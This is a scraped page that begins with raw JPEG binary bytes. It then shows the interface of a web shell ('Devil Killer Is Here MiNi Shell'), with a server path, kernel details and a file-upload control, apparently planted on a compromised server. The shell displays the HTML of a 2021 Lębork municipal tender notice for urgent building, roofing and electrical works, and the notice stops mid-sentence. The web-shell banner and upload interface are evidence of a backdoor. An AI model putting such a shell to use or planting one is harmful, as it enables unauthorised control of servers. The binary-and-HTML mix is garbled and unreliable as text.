JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210729/0013154002-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00131540 z dnia 2021-07-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> WYKONANIE PILNYCH ROBÓT BUDOWLANYCH BRANŻY OGÓLNOBUDOWLANEJ, DEKARSKIEJ, ELEKTRYCZNEJ<br/>I INSTALACYJNEJ W BUDYNKACH I LOKALACH STANOWIĄCYCH WŁASNOŚĆ GMINY MIASTO LĘBORK W 2021 ROKU </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Lębork</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979737</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lębork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 86 37 833</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 86 22 427</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk@um.lebork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lebork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYKONANIE PILNYCH ROBÓT BUDOWLANYCH BRANŻY OGÓLNOBUDOWLANEJ, DEKARSKIEJ, ELEKTRYCZNEJ<br/>I INSTALACYJNEJ W BUDYNKACH I LOKALACH STANOWIĄCYCH WŁASNOŚĆ GMINY MIASTO LĘBORK W 2021 ROKU </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3ba10bf2-f072-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00131540</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007574/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Wykonanie pilnych robót budowlanych branży ogólnobudowlanej, dekarskiej, elektrycznej i instalacyjnej w budynkach i lokalach stanowiących własność Gminy Miasto Lębork</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lebork <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lebork</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Opisane szczegółowo w dziale III, rozdziale 1 SWZ<br/>1. SPOSÓB POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI<br/>1) Wszelka korespondencja związaną z przedmiotowym postępowaniem, w tym złożenie oferty, następuje wyłącznie przy użyciu Platformy zakupowej: https://platformazakupowa.pl/pn/lebork . Zaleca się komunikację za pośrednictwem https://platformazakupowa.pl/pn/lebork poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego”, po którym pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>2) Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej:<br/>a) wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy zakupowej na stronie: https://platformazakupowa.pl/strona/1-regulamin <br/>b) korzystanie z Platformy zakupowej jest bezpłatne.<br/>3) We wszelkiej korespondencji związanej z przedmiotowym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania wskazanym w SWZ lub numerem ogłoszenia opublikowanego w Biuletynie Zamówień Publicznych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Opisany w dziale I pkt 15 SWZ<br/>1) Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/> z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/> danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/> danych ) (Dz. Urz. UE L 119 z 04.05.2016 r., str. 1), zwane dalej „RODO”, Zamawiający<br/> informuje, że:<br/> a) administratorem danych osobowych jest Urząd Miejski w Lęborku, ul. Armii<br/> Krajowej 14, 84-300 Lębork, tel. 059 862 42 80;<br/> b) inspektorem ochrony danych osobowych w Urzędzie Miejskim w Lęborku jest <br/> p. Bożena Steciuk, e-mail: iod@um.lebork.pl, tel. ; 059 863 77 33;<br/> c) dane osobowe przekazane przez Wykonawcę przetwarzane będą na podstawie<br/> art. 6 ust. 1 lit c RODO w celu związanym z postępowaniem o udzielenie<br/> zamówienia publicznego pn.: „Wykonanie pilnych robót budowlanych branży<br/> ogólnobudowlanej, dekarskiej, elektrycznej i instalacyjnej w budynkach i lokalach<br/> stanowiących własność Gminy Miasto Lębork w 2021 roku” <br/> ZK.271. 10. 2021.EK .<br/> d) odbiorcami danych osobowych przekazanych przez Wykonawcę będą osoby lub<br/> podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu<br/> o art. 18, art. 74 oraz art. 75 Ustawy Pzp.<br/> e) dane osobowe przekazane przez Wykonawcę będą przechowywane, zgodnie <br/> z art. 78 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania <br/> o udzielenie zamówienia;<br/> f) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio<br/> dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach<br/> Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/> publicznego, konsekwencje niepodania określonych danych wynikają z Ustawy <br/> Pzp;<br/> g) w odniesieniu do danych osobowych przekazanych przez Wykonawcę decyzje nie<br/> będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/> h) Wykonawca posiada:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych <br/> dotyczących Wykonawcy;<br/> na podstawie art. 16 RODO prawo do sprostowania danych osobowych <br/> Wykonawcy;<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/> przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/> mowa w art. 18 ust. 2 RODO;<br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,<br/> gdy Wykonawca uzna, że przetwarzanie danych osobowych dotyczących<br/> Wykonawcy narusza przepisy RODO;<br/> i) Wykonawcy nie przysługuje:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych <br/> osobowych<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych<br/> osobowych, gdyż podstawą prawną przetwarzania danych osobowych<br/> Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZK.271.10.2021.EK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. PRZEDMIOT ZAMÓWIENIA<br/>a) Przedmiot zamówienia stanowi: Wykonanie pilnych robót budowlanych branży ogólnobudowlanej, dekarskiej, elektrycznej i instalacyjnej w budynkach i lokalach stanowiących własność Gminy Miasto Lębork w 2021 roku. <br/>W chwili obecnej w zasobach komunalnych znajdują się 1242 mieszkania komunalne usytuowane zarówno w budynkach Wspólnot Mieszkaniowych jak i w 74 budynkach mieszkalnych będących własnością Gminy Miasto Lębork. <br/>b) Wspólny Słownik Zamówień: <br/>45210000-2 – Roboty budowlane w zakresie budynków<br/>45300000-0 – Roboty instalacyjne w budynkach<br/>45261900-3 – Naprawa i konserwacja dachów<br/>c) Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji i odbioru określają:<br/> Specyfikacja techniczna wykonania i odbioru robót budowlanych - załącznik nr 1<br/> do projektu umowy stanowiącego załącznik nr 1 do SWZ, <br/> projekt umowy – załącznik nr 1 do SWZ.<br/>Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej<br/>z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261900-3 - Naprawa i konserwacja dachów</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp, w okresie 3 lat <br/>od dnia udzielenia zamówienia podstawowego, udzielenie dotychczasowemu Wykonawcy, zamówienia polegającego na powtórzeniu podobnych robót budowlanych, stanowiących nie więcej niż 70% wartości zamówienia podstawowego. <br/>Zamówienie to zostało przewidziane w ogłoszeniu o niniejszym zamówieniu podstawowym, jest zgodne z jego przedmiotem oraz jego wartość została uwzględniona przy obliczaniu wartości zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">ocena kryteriów: cena oraz okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa następujące warunki udziału<br/>w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu.<br/> Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie <br/> treści złożonego oświadczenia - załącznika nr 3 do SWZ wg formuły spełnia – nie<br/> spełnia. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/> o ile wynika to z odrębnych przepisów.<br/> Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu.<br/> Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie <br/> treści złożonego oświadczenia - załącznika nr 3 do SWZ wg formuły spełnia – nie<br/> spełnia. <br/>3) sytuacji ekonomicznej lub finansowej:<br/> Zamawiający wymaga, aby Wykonawca posiadał odpowiednie ubezpieczenie od<br/> odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/> przedmiotem zamówienia na kwotę co najmniej 500.000,00 zł.<br/> Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie <br/> treści złożonego dokumentu potwierdzającego wymagane ubezpieczenie oraz treści <br/> złożonego oświadczenia - załącznika nr 3 do SWZ wg formuły spełnia - nie spełnia. <br/>4) zdolności technicznej lub zawodowej:<br/> Zamawiający wymaga, aby Wykonawca wykazał, iż dysponuje co najmniej czterema<br/> osobami zatrudnionymi na podstawie umowy o pracę, które będą wykonywać<br/> czynności bezpośrednio związane z realizacją przedmiotowych prac budowlanych, <br/> w tym co najmniej jedna z wyżej wymienionych osób musi posiadać świadectwa <br/> kwalifikacyjne wydawane przez komisje powołane przez Prezesa Urzędu Regulacji<br/> Energetyki uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci<br/> na stanowisku eksploatacji i dozoru w zakresie:<br/> Grupa 1. Obsługa, konserwacja, montaż urządzeń, instalacji i sieci <br/> elektroenergetycznych wytwarzających, przetwarzających, przesyłających i<br/> zużywających energię elektryczną: <br/> 2. urządzenia i instalacje elektroenergetyczne o napięciu nie wyższym niż 1kV,<br/> 10. aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej <br/> regulacji, sterowania i zabezpieczeń urządzeń i instalacji wymienionych w pkt 2,<br/> Grupa 3. Obsługa, konserwacja, remont, montaż, kontrola-pomiar urządzeń, instalacji<br/> i sieci gazowych wytwarzających, przetwarzających, przesyłających, magazynujących<br/> i zużywających paliwa gazowe:<br/> 6. urządzenia i instalacje gazowe o ciśnieniu nie wyższym niż 5 kPa,<br/> 7. urządzenia i instalacje gazowe o ciśnieniu powyżej niż 5 kPa,<br/> 10. aparatura kontrolno-pomiarowa, urządzenia sterowania do sieci, urządzeń <br/> i instalacji wymienionych w pkt 6 i 7.<br/> Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie <br/> treści złożonego dokumentu - Załącznika nr 4 do SWZ tj. wykazu osób zatrudnionych <br/> przez Wykonawcę oraz treści złożonego oświadczenia - załącznika nr 3 do SWZ <br/> wg formuły spełnia - nie spełnia <br/>5) W celu potwierdzenia, że Wykonawca spełnia warunki udziału oraz nie podlega<br/> wykluczeniu w postępowaniu, zobowiązany jest złożyć wraz z ofertą następujące<br/> dokumenty w określonych przypadkach:<br/>a) w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców - Oświadczenie składane na podstawie art. 125 ust 1 ustawy Pzp, składa w swoim imieniu każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu, według wzoru stanowiącego załącznik nr 3 do SWZ,<br/>b) Zamawiający nie żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowych środków dowodowych dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Opisane w dziale II rozdział 8 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Opisane w dziale II rozdział 8 SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga, od Wykonawców przedłożenia wraz z ofertą przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca przystępujący do postępowania jest zobowiązany do wniesienia wadium w kwocie: 20.000 zł (słownie: dwadzieścia tysięcy złotych 00/100) przed upływem terminu składania ofert, wskazanym w SWZ dział III, rozdział 2. <br/>2) Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>3) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w Banku Pekao SA, numer rachunku 21 1240 1268 1111 0010 87290508 . Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>4) Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty<br/>w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno ono zawierać następujące elementy:<br/>nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego),<br/>a) gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym <br/> w gwarancji lub poręczeniu jest Gmina Miasto Lębork, ul. Armii Krajowej 14, <br/> 84-300 Lębork,<br/> b) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/> c) kwotę gwarancji/poręczenia,<br/> d) termin ważności gwarancji/poręczenia,<br/> e) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia<br/> bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach<br/> określonych w art. 98 ust. 6 ustawy Pzp.<br/>5) W przypadku, gdy Wykonawca nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>6) Zamawiający zwraca wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>7) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie przedmiotowego zamówienia, spełniając przy tym następujące wymagania: <br/>a) Wykonawcy ustanawiają Pełnomocnika wraz z podaniem jego danych<br/> teleadresowych do reprezentowania ich w postępowaniu o udzielenie<br/> przedmiotowego zamówienia albo do reprezentowania ich w postępowaniu <br/> i zawarcia umowy w sprawie zamówienia publicznego. <br/>b) Każdy z wykonawców wspólnie ubiegających się o 